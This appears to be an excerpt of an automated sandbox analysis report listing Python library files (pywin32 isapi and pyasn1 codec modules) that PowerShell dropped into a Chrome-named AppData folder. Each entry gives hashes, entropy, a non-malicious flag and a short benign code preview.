                                                                                                                                                                                                  Preview:# This is an ISAPI extension purely for testing purposes. It is NOT.# a 'demo' (even though it may be useful!).#.# Install this extension, then point your browser to:.# "http://localhost/pyisapi_test/test1".# This will execute the method 'test1' below. See below for the list of.# test methods that are acceptable...import urllib.error.import urllib.parse.import urllib.request..# If we have no console (eg, am running from inside IIS), redirect output.# somewhere useful - in this case, the standard win32 trace collector..import win32api.import winerror..from isapi import ExtensionError, isapicon, threaded_extension.from isapi.simple import SimpleFilter..try:. win32api.GetConsoleTitle().except win32api.error:. # No console - redirect. import win32traceutil...# The ISAPI extension - handles requests in our virtual dir, and sends the.# response to the client..class Extension(threaded_extension.ThreadPoolExtension):. "Python ISAPI Tester".. def Dispatch(self, ecb):. pr

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\isapi\threaded_extension.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):7325
                                                                                                                                                                                                  Entropy (8bit):4.496571622826724
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:pIRBkE/cXV6YMNKUxA9yU/tjgcTaFHDZapRVqvk:p0x/YMNxOBVgcTKHDZNk
                                                                                                                                                                                                  MD5:C214741870D6B454C367B90334A686DC
                                                                                                                                                                                                  SHA1:0C53EA3491F82A1B4FA6196664E7B0463BE6AFFE
                                                                                                                                                                                                  SHA-256:C2F3CA495C0C326B3EE07F6337D9FF42AFE2D0CBC5F7E8BADDECFB12392515A0
                                                                                                                                                                                                  SHA-512:6CD978D45AB9EF55CBEC09CC40A9DB91F38FF536BEA77EAFE8493486966ECE2FE0E7F7E6084E560DBCC86394A268E31AB68255ADCD7F7F6D859BE95921F5E553
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""An ISAPI extension base class implemented using a thread-pool.""".# $Id$..import sys.import threading.import time.import traceback..from pywintypes import OVERLAPPED.from win32event import INFINITE.from win32file import (. CloseHandle,. CreateIoCompletionPort,. GetQueuedCompletionStatus,. PostQueuedCompletionStatus,.).from win32security import SetThreadToken..import isapi.simple.from isapi import ExtensionError, isapicon..ISAPI_REQUEST = 1.ISAPI_SHUTDOWN = 2...class WorkerThread(threading.Thread):. def __init__(self, extension, io_req_port):. self.running = False. self.io_req_port = io_req_port. self.extension = extension. threading.Thread.__init__(self). # We wait 15 seconds for a thread to terminate, but if it fails to,. # we don't want the process to hang at exit waiting for it.... self.setDaemon(True).. def run(self):. self.running = True. while self.running:. errCode, bytes, key, overlap

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pyasn1\__init__.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):66
                                                                                                                                                                                                  Entropy (8bit):4.608121581184648
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:SHWfrSLqgOAbV9N4MLvYnPn:SHWfGLqhAxRYPn
                                                                                                                                                                                                  MD5:0AD7C7B33183D588D001BE929EF9761A
                                                                                                                                                                                                  SHA1:FFF1F3360360AEA1108F55D3133B8173CED480FB
                                                                                                                                                                                                  SHA-256:B5CE16BA552FE1992992656D79EF7E16C81CEA08BD8D9147D5521B02F4968F7B
                                                                                                                                                                                                  SHA-512:8B3D1D475C63868471D478DD5FAB10D41CC6B963C612846706836518820D6DFD710B3B50284F4222ED627EBA74E1AF61353FCC17FC67F7993A02C5637602AD9F
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# https://www.python.org/dev/peps/pep-0396/.__version__ = '0.6.1'.

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pyasn1\codec\__init__.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):59
                                                                                                                                                                                                  Entropy (8bit):4.089038983548258
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:SbFQmxAG65kQWIXtH0EEvn:SbFd65kDSH9Ev
                                                                                                                                                                                                  MD5:0FC1B4D3E705F5C110975B1B90D43670
                                                                                                                                                                                                  SHA1:14A9B683B19E8D7D9CB25262CDEFCB72109B5569
                                                                                                                                                                                                  SHA-256:1040E52584B5EF6107DFD19489D37FF056E435C598F4E555F1EDF4015E7CA67D
                                                                                                                                                                                                  SHA-512:8A147C06C8B0A960C9A3FA6DA3B30A3B18D3612AF9C663EE24C8D2066F45419A2FF4AA3A636606232ECA12D7FAEF3DA0CBBD3670A2D72A3281544E1C0B8EDF81
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# This file is necessary to make this directory a package..

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pyasn1\codec\ber\__init__.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):59
                                                                                                                                                                                                  Entropy (8bit):4.089038983548258
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:SbFQmxAG65kQWIXtH0EEvn:SbFd65kDSH9Ev
                                                                                                                                                                                                  MD5:0FC1B4D3E705F5C110975B1B90D43670
                                                                                                                                                                                                  SHA1:14A9B683B19E8D7D9CB25262CDEFCB72109B5569
                                                                                                                                                                                                  SHA-256:1040E52584B5EF6107DFD19489D37FF056E435C598F4E555F1EDF4015E7CA67D
                                                                                                                                                                                                  SHA-512:8A147C06C8B0A960C9A3FA6DA3B30A3B18D3612AF9C663EE24C8D2066F45419A2FF4AA3A636606232ECA12D7FAEF3DA0CBBD3670A2D72A3281544E1C0B8EDF81
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# This file is necessary to make this directory a package..

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pyasn1\codec\ber\decoder.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):79192
                                                                                                                                                                                                  Entropy (8bit):4.267001943836025
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:H8yAMLWEfmqqB6kfZHoWkf7EPbo3gJwd/JcIk+A:H8yAMLWEfmqqB6kfZHoWkf7EPbo3gJyK
                                                                                                                                                                                                  MD5:9F23FCD79FD7771CC62EBDD3BB9D0C41
                                                                                                                                                                                                  SHA1:8582FE4C98C1A0573A431F442E62B27258521691
                                                                                                                                                                                                  SHA-256:1D959CDCCF78D3A6E1029B8917E4C062945F2D6BD04F9E02AD1103A833325346
                                                                                                                                                                                                  SHA-512:BAF3732EBD7115EDCD2C800B5BE5687E5055C75E4D3E46CF7F62D0B049ED1B0C6110744521211FDF3FF89FB76144B668B45C79F286080C82A9FFCE06D7BB6554
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:#.# This file is part of pyasn1 software..#.# Copyright (c) 2005-2020, Ilya Etingof <etingof@gmail.com>.# License: https://pyasn1.readthedocs.io/en/latest/license.html.#.import io.import os.import sys.import warnings..from pyasn1 import debug.from pyasn1 import error.from pyasn1.codec.ber import eoo.from pyasn1.codec.streaming import asSeekableStream.from pyasn1.codec.streaming import isEndOfStream.from pyasn1.codec.streaming import peekIntoStream.from pyasn1.codec.streaming import readFromStream.from pyasn1.compat import _MISSING.from pyasn1.error import PyAsn1Error.from pyasn1.type import base.from pyasn1.type import char.from pyasn1.type import tag.from pyasn1.type import tagmap.from pyasn1.type import univ.from pyasn1.type import useful..__all__ = ['StreamingDecoder', 'Decoder', 'decode']..LOG = debug.registerLoggee(__name__, flags=debug.DEBUG_DECODER)..noValue = base.noValue..SubstrateUnderrunError = error.SubstrateUnderrunError...class AbstractPayloadDecoder(object):. protoCom

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pyasn1\codec\ber\encoder.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):29796
                                                                                                                                                                                                  Entropy (8bit):4.457977497334843
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:RN6QSj8gQPOPRDusCbhbPnMywJRAoWdun5vSIgPPSOdvXdK1s+0x3PUUjM1QA:RN6QSj8gQPOPCwJRAoWdun5vSIgPPSOG
                                                                                                                                                                                                  MD5:C20EF3AC7D8B0C233083122BB4742188
                                                                                                                                                                                                  SHA1:A1D576D7E558404AD781D201912825EE06C32915
                                                                                                                                                                                                  SHA-256:78EFFEFB96FED075E63E9216D8985895E8D4E95EC5C1D39199717209F287CB32
                                                                                                                                                                                                  SHA-512:D0D0E354762245FAA1ABB63F72830B7AF77EB6FECDA0DFBB59498467020ECB8DCA31275FC79B7554B6080974FB5442CB27A9BDA6D2C1E4AA2E07EE090E46FEF2
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:#.# This file is part of pyasn1 software..#.# Copyright (c) 2005-2020, Ilya Etingof <etingof@gmail.com>.# License: https://pyasn1.readthedocs.io/en/latest/license.html.#.import sys.import warnings..from pyasn1 import debug.from pyasn1 import error.from pyasn1.codec.ber import eoo.from pyasn1.compat import _MISSING.from pyasn1.compat.integer import to_bytes.from pyasn1.type import char.from pyasn1.type import tag.from pyasn1.type import univ.from pyasn1.type import useful..__all__ = ['Encoder', 'encode']..LOG = debug.registerLoggee(__name__, flags=debug.DEBUG_ENCODER)...class AbstractItemEncoder(object):. supportIndefLenMode = True.. # An outcome of otherwise legit call `encodeFun(eoo.endOfOctets)`. eooIntegerSubstrate = (0, 0). eooOctetsSubstrate = bytes(eooIntegerSubstrate).. # noinspection PyMethodMayBeStatic. def encodeTag(self, singleTag, isConstructed):. tagClass, tagFormat, tagId = singleTag. encodedTag = tagClass | tagFormat. if isConstruct

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pyasn1\codec\ber\eoo.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):639
                                                                                                                                                                                                  Entropy (8bit):4.884028935699989
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:L6FLCXLGnw2QC+CDexoDexyRYXjsidW9J5qjk2TjZ1YkxNOtz8:viw2QC+CDJD1UsBqg2THRNu8
                                                                                                                                                                                                  MD5:C3E4126104E2EF8128432E37E6989AD8
                                                                                                                                                                                                  SHA1:31C3FBBEDCCCCE5DF46F60FC9A58BE142DB9A86B
                                                                                                                                                                                                  SHA-256:76CA4B29CDB1AFF5B94DB72BD9671F2DDFDB24B84E8E8B6AD58C4A9F70C240D2
                                                                                                                                                                                                  SHA-512:AD1B4F475CD30516A7CB950E8344C1B0CCB430E1411A2396316134515B0A00F4EC2B892592653B988E09F958AD928C2C1D3BE1DDF7526C081FC61AEB56425D66
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:#.# This file is part of pyasn1 software..#.# Copyright (c) 2005-2020, Ilya Etingof <etingof@gmail.com>.# License: https://pyasn1.readthedocs.io/en/latest/license.html.#.from pyasn1.type import base.from pyasn1.type import tag..__all__ = ['endOfOctets']...class EndOfOctets(base.SimpleAsn1Type):. defaultValue = 0. tagSet = tag.initTagSet(. tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 0x00). ).. _instance = None.. def __new__(cls, *args, **kwargs):. if cls._instance is None:. cls._instance = object.__new__(cls, *args, **kwargs).. return cls._instance...endOfOctets = EndOfOctets().

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pyasn1\codec\cer\__init__.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):59
                                                                                                                                                                                                  Entropy (8bit):4.089038983548258
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:SbFQmxAG65kQWIXtH0EEvn:SbFd65kDSH9Ev
                                                                                                                                                                                                  MD5:0FC1B4D3E705F5C110975B1B90D43670
                                                                                                                                                                                                  SHA1:14A9B683B19E8D7D9CB25262CDEFCB72109B5569
                                                                                                                                                                                                  SHA-256:1040E52584B5EF6107DFD19489D37FF056E435C598F4E555F1EDF4015E7CA67D
                                                                                                                                                                                                  SHA-512:8A147C06C8B0A960C9A3FA6DA3B30A3B18D3612AF9C663EE24C8D2066F45419A2FF4AA3A636606232ECA12D7FAEF3DA0CBBD3670A2D72A3281544E1C0B8EDF81
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# This file is necessary to make this directory a package..

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pyasn1\codec\cer\decoder.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):4589
                                                                                                                                                                                                  Entropy (8bit):5.092475796325964
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:lip6oyPkf/vadzSzRJqs+YCJzseUkRzM4x7aJg8eiHCA:lm6XPkfHadzSzrq1YCJzs1kRDn8eiiA
                                                                                                                                                                                                  MD5:D5A81ACC3F570229E2699C464032D0A4
                                                                                                                                                                                                  SHA1:87C99BF231930448E6D80669C0ECBEAAE931D81E
                                                                                                                                                                                                  SHA-256:4B6EFDFCB463C07C93501BAFE0B3D83A989BD57E212E6061FF77ADE3DA1C9B80
                                                                                                                                                                                                  SHA-512:DDD60F87BFFE79329DF0DB09049756AE4944A9803347DA38AECE4AD1A27517D9DA31055F99B79B148B1A60772B7E09A894C1FED39B85BC231436BE1371E6039E
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:#.# This file is part of pyasn1 software..#.# Copyright (c) 2005-2020, Ilya Etingof <etingof@gmail.com>.# License: https://pyasn1.readthedocs.io/en/latest/license.html.#.import warnings..from pyasn1 import error.from pyasn1.codec.streaming import readFromStream.from pyasn1.codec.ber import decoder.from pyasn1.type import univ..__all__ = ['decode', 'StreamingDecoder']..SubstrateUnderrunError = error.SubstrateUnderrunError...class BooleanPayloadDecoder(decoder.AbstractSimplePayloadDecoder):. protoComponent = univ.Boolean(0).. def valueDecoder(self, substrate, asn1Spec,. tagSet=None, length=None, state=None,. decodeFun=None, substrateFun=None,. **options):.. if length != 1:. raise error.PyAsn1Error('Not single-octet Boolean payload').. for chunk in readFromStream(substrate, length, options):. if isinstance(chunk, SubstrateUnderrunError):. yield chunk.. byte = chunk[0

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pyasn1\codec\cer\encoder.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):9838
                                                                                                                                                                                                  Entropy (8bit):4.809746660729571
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:l9W9lxp8638xHT6oGst1V/Ueo8IBqlTHRYkFGDRC2260kNtdslA:lMq6oGg1NfWCRYkFGDRC2ykNtdslA
                                                                                                                                                                                                  MD5:AB5C0BD7E6C4E19EB77C5202B9072477
                                                                                                                                                                                                  SHA1:CC88103FC5B4AAD7678473B2E1D89A09CC30FA72
                                                                                                                                                                                                  SHA-256:BEC1AB80E1C9A244DE66A049C0D1A891E8EFA87E447D3BF2F2113177F8F96DB6
                                                                                                                                                                                                  SHA-512:95F50A7665678DE63544B31EB0498C24189359347B1DC52FBCDDA2D0E910E13521C7C6449B76ECB0D0025417E7B89CF604C5AF7623CE1B3A7B888DDD812843E3
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:#.# This file is part of pyasn1 software..#.# Copyright (c) 2005-2020, Ilya Etingof <etingof@gmail.com>.# License: https://pyasn1.readthedocs.io/en/latest/license.html.#.import warnings..from pyasn1 import error.from pyasn1.codec.ber import encoder.from pyasn1.type import univ.from pyasn1.type import useful..__all__ = ['Encoder', 'encode']...class BooleanEncoder(encoder.IntegerEncoder):. def encodeValue(self, value, asn1Spec, encodeFun, **options):. if value == 0:. substrate = (0,). else:. substrate = (255,). return substrate, False, False...class RealEncoder(encoder.RealEncoder):. def _chooseEncBase(self, value):. m, b, e = value. return self._dropFloatingPoint(m, b, e)...# specialized GeneralStringEncoder here..class TimeEncoderMixIn(object):. Z_CHAR = ord('Z'). PLUS_CHAR = ord('+'). MINUS_CHAR = ord('-'). COMMA_CHAR = ord(','). DOT_CHAR = ord('.'). ZERO_CHAR = ord('0').. MIN_LENGTH = 12. MAX_LENGT

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pyasn1\codec\der\__init__.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):59
                                                                                                                                                                                                  Entropy (8bit):4.089038983548258
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:SbFQmxAG65kQWIXtH0EEvn:SbFd65kDSH9Ev
                                                                                                                                                                                                  MD5:0FC1B4D3E705F5C110975B1B90D43670
                                                                                                                                                                                                  SHA1:14A9B683B19E8D7D9CB25262CDEFCB72109B5569
                                                                                                                                                                                                  SHA-256:1040E52584B5EF6107DFD19489D37FF056E435C598F4E555F1EDF4015E7CA67D
                                                                                                                                                                                                  SHA-512:8A147C06C8B0A960C9A3FA6DA3B30A3B18D3612AF9C663EE24C8D2066F45419A2FF4AA3A636606232ECA12D7FAEF3DA0CBBD3670A2D72A3281544E1C0B8EDF81
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# This file is necessary to make this directory a package..

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pyasn1\codec\der\decoder.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3428
                                                                                                                                                                                                  Entropy (8bit):5.148297897589633
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:lb6a5VzZz4qsOCJzseUkazT4xQaJx8MOiZBCA:lb6a5VzZz4qtCJzs1kazi8MOiZYA
                                                                                                                                                                                                  MD5:EE0CB17D8EE0D8BF236E88EF140214BB
                                                                                                                                                                                                  SHA1:CE07FDD44D07346A1722A9055BBAA199511FF89C
                                                                                                                                                                                                  SHA-256:18EA4A675C0545853410417791298868C7DED61DB0D7B55D1AEE7B00752A405C
                                                                                                                                                                                                  SHA-512:326D54257678248FA51808A654FD047C9BF5E136EA0923856AD995ED6EDF6088D2278D59C80F7B6B3085E19499FD11DC39888B941FF23DA025AC55F69046EAAB
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:#.# This file is part of pyasn1 software..#.# Copyright (c) 2005-2020, Ilya Etingof <etingof@gmail.com>.# License: https://pyasn1.readthedocs.io/en/latest/license.html.#.import warnings..from pyasn1.codec.cer import decoder.from pyasn1.type import univ..__all__ = ['decode', 'StreamingDecoder']...class BitStringPayloadDecoder(decoder.BitStringPayloadDecoder):. supportConstructedForm = False...class OctetStringPayloadDecoder(decoder.OctetStringPayloadDecoder):. supportConstructedForm = False...# TODO: prohibit non-canonical encoding.RealPayloadDecoder = decoder.RealPayloadDecoder..TAG_MAP = decoder.TAG_MAP.copy().TAG_MAP.update(. {univ.BitString.tagSet: BitStringPayloadDecoder(),. univ.OctetString.tagSet: OctetStringPayloadDecoder(),. univ.Real.tagSet: RealPayloadDecoder()}.)..TYPE_MAP = decoder.TYPE_MAP.copy()..# Put in non-ambiguous types for faster codec lookup.for typeDecoder in TAG_MAP.values():. if typeDecoder.protoComponent is not None:. typeId = typeDec

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pyasn1\codec\der\encoder.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3479
                                                                                                                                                                                                  Entropy (8bit):4.989016725995753
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:lmJ9RUn8ldU5etKvLJY2l1ocwekN0JwU5KnwaQOoCA:lmJX/UMQY2l1kN47aQOnA
                                                                                                                                                                                                  MD5:6B0B1898834BC861E9452BF77568395E
                                                                                                                                                                                                  SHA1:79DC83CC60A6367BD546ED382932DFEB1EF39A4A
                                                                                                                                                                                                  SHA-256:95DC6BA6F5C316CC4BC6DBCDEDA891EB524D36D6A29CD6A06424A9B1933D0D9B
                                                                                                                                                                                                  SHA-512:DF031B5A9F72A1AB8BFB1B6FC2B51A34EFE20B84660DA9D8763015F0A8B0CE5AC6CB414C56781EFDC190B252D65638D4F92591F0CF005BEF440EF8F38C6700A5
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:#.# This file is part of pyasn1 software..#.# Copyright (c) 2005-2020, Ilya Etingof <etingof@gmail.com>.# License: https://pyasn1.readthedocs.io/en/latest/license.html.#.import warnings..from pyasn1 import error.from pyasn1.codec.cer import encoder.from pyasn1.type import univ..__all__ = ['Encoder', 'encode']...class SetEncoder(encoder.SetEncoder):. @staticmethod. def _componentSortKey(componentAndType):. """Sort SET components by tag.. Sort depending on the actual Choice value (dynamic sort). """. component, asn1Spec = componentAndType.. if asn1Spec is None:. compType = component. else:. compType = asn1Spec.. if compType.typeId == univ.Choice.typeId and not compType.tagSet:. if asn1Spec is None:. return component.getComponent().tagSet. else:. # TODO: move out of sorting key function. names = [namedType.name for namedType in asn1Spec.componentT

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pyasn1\codec\native\__init__.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):59
                                                                                                                                                                                                  Entropy (8bit):4.089038983548258
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:SbFQmxAG65kQWIXtH0EEvn:SbFd65kDSH9Ev
                                                                                                                                                                                                  MD5:0FC1B4D3E705F5C110975B1B90D43670
                                                                                                                                                                                                  SHA1:14A9B683B19E8D7D9CB25262CDEFCB72109B5569
                                                                                                                                                                                                  SHA-256:1040E52584B5EF6107DFD19489D37FF056E435C598F4E555F1EDF4015E7CA67D
                                                                                                                                                                                                  SHA-512:8A147C06C8B0A960C9A3FA6DA3B30A3B18D3612AF9C663EE24C8D2066F45419A2FF4AA3A636606232ECA12D7FAEF3DA0CBBD3670A2D72A3281544E1C0B8EDF81
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# This file is necessary to make this directory a package..

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pyasn1\codec\native\decoder.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):9118
                                                                                                                                                                                                  Entropy (8bit):4.976000713948337
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:l5I+VTlaQp/jaDx+mo9L0i6Yxq1AUMmHGJb5CcolZ1TloUq5/XlI2a5h2WVZx7+N:l5nVTlas/jaV+mo9L0i6Yxq1AUMmHGJb
                                                                                                                                                                                                  MD5:ED2CB4DE386A31E901C60F4D620D454E
                                                                                                                                                                                                  SHA1:1A9DC00FC8F90FB480C6C572BA3A1AFE74445D51
                                                                                                                                                                                                  SHA-256:DAF2BD074009CCB4F67B148DB65094958CD9BE6D04EC8CD453C62083F94BC4DA
                                                                                                                                                                                                  SHA-512:532F86F453D60BC55959EDBEE0A1D8A936A1ADBB48A80E63E158DE5A324DD9BB9A4B014ED9E870F26817BA4E78A8EAE70FD16008FA09856775A3BEB00A6A471F
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:#.# This file is part of pyasn1 software..#.# Copyright (c) 2005-2020, Ilya Etingof <etingof@gmail.com>.# License: https://pyasn1.readthedocs.io/en/latest/license.html.#.import warnings..from pyasn1 import debug.from pyasn1 import error.from pyasn1.compat import _MISSING.from pyasn1.type import base.from pyasn1.type import char.from pyasn1.type import tag.from pyasn1.type import univ.from pyasn1.type import useful..__all__ = ['decode']..LOG = debug.registerLoggee(__name__, flags=debug.DEBUG_DECODER)...class AbstractScalarPayloadDecoder(object):. def __call__(self, pyObject, asn1Spec, decodeFun=None, **options):. return asn1Spec.clone(pyObject)...class BitStringPayloadDecoder(AbstractScalarPayloadDecoder):. def __call__(self, pyObject, asn1Spec, decodeFun=None, **options):. return asn1Spec.clone(univ.BitString.fromBinaryString(pyObject))...class SequenceOrSetPayloadDecoder(object):. def __call__(self, pyObject, asn1Spec, decodeFun=None, **options):. asn1Val

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pyasn1\codec\native\encoder.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):9184
                                                                                                                                                                                                  Entropy (8bit):4.926081136438896
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:lVVD0cdcJGvPPSOxtyvXdK1s+0x3PUULkVPpyyaPVvrxS8C4A:lzaJ6PPSOKvXdK1s+0x3PUULk8vrxS8u
                                                                                                                                                                                                  MD5:8E7A855B41557E882C28DD9954B5BD60
                                                                                                                                                                                                  SHA1:5F7F3C0F78CD869CF5EBB08580CF193B858FA73F
                                                                                                                                                                                                  SHA-256:0B6E0BE459308573D2472B5A2E570BD2EB980D30B60570FBE59C07FDB0AA297F
                                                                                                                                                                                                  SHA-512:232FF4FEFE7065E4DA75F5945B158BFFD3626C4B26CAB6CCB7AC9D1B1AA793780739F9B5DD5483CB3707FBBA1FBF16F53BF1A9D22D08A90B448A51726530E11A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:#.# This file is part of pyasn1 software..#.# Copyright (c) 2005-2020, Ilya Etingof <etingof@gmail.com>.# License: https://pyasn1.readthedocs.io/en/latest/license.html.#.from collections import OrderedDict.import warnings..from pyasn1 import debug.from pyasn1 import error.from pyasn1.compat import _MISSING.from pyasn1.type import base.from pyasn1.type import char.from pyasn1.type import tag.from pyasn1.type import univ.from pyasn1.type import useful..__all__ = ['encode']..LOG = debug.registerLoggee(__name__, flags=debug.DEBUG_ENCODER)...class AbstractItemEncoder(object):. def encode(self, value, encodeFun, **options):. raise error.PyAsn1Error('Not implemented')...class BooleanEncoder(AbstractItemEncoder):. def encode(self, value, encodeFun, **options):. return bool(value)...class IntegerEncoder(AbstractItemEncoder):. def encode(self, value, encodeFun, **options):. return int(value)...class BitStringEncoder(AbstractItemEncoder):. def encode(self, value,

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pyasn1\codec\streaming.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):6377
                                                                                                                                                                                                  Entropy (8bit):4.524058139339172
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:1FSv+eL4aBtzunZuIhV4lqTsUiMELJgtYTqviM3AX:1wv+stSoIhVlioujjX
